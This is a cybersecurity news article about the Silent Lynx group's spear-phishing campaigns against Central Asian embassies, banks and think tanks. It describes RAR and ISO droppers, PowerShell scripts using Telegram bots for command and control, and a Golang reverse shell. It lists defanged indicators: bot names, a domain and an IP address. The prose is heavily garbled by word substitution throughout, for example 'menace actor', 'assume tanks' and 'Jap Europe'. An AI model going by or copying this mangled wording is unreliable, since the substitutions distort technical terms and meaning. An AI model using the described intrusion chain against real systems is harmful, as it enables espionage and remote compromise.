A beforehand undocumented menace actor often known as Silent Lynx has been linked to cyber assaults focusing on numerous entities in Kyrgyzstan and Turkmenistan.
“This menace group has beforehand focused entities round Jap Europe and Central Asian authorities assume tanks concerned in financial choice making and banking sector,” Seqrite Labs researcher Subhajeet Singha said in a technical report printed late final month.
Targets of the hacking group’s assaults embody embassies, attorneys, government-backed banks, and assume tanks. The exercise has been attributed to a Kazakhstan-origin menace actor with a medium stage of confidence.
The infections start with a spear-phishing e mail containing a RAR archive attachment that finally acts as a supply automobile for malicious payloads liable for granting distant entry to the compromised hosts.
The primary of the 2 campaigns, detected by the cybersecurity firm on December 27, 2024, leverages the RAR archive to launch an ISO file that, in flip, features a malicious C++ binary and a decoy PDF file. The executable subsequently proceeds to run a PowerShell script that makes use of Telegram bots (named “@south_korea145_bot” and “@south_afr_angl_bot”) for command execution and knowledge exfiltration.
Among the instructions executed by way of the bots embody curl instructions to obtain and save extra payloads from a distant server (“pweobmxdlboi[.]com”) or Google Drive.
The opposite marketing campaign, in distinction, employs a malicious RAR archive containing two information: A decoy PDF and a Golang executable, the latter of which is designed to determine a reverse shell to an attacker-controlled server (“185.122.171[.]22:8082”).
Seqrite Labs stated it noticed some stage of tactical overlaps between the menace actor and YoroTrooper (aka SturgeonPhisher), which has been linked to assaults focusing on the Commonwealth of Unbiased States (CIS) nations utilizing PowerShell and Golang instruments.
“Silent Lynx’s campaigns display a complicated multi-stage assault technique utilizing ISO information, C++ loaders, PowerShell scripts, and Golang implants,” Singha stated.
“Their reliance on Telegram bots for command and management, mixed with decoy paperwork and regional focusing on which additionally highlights their concentrate on espionage in Central Asia and SPECA based mostly nations.”
Source link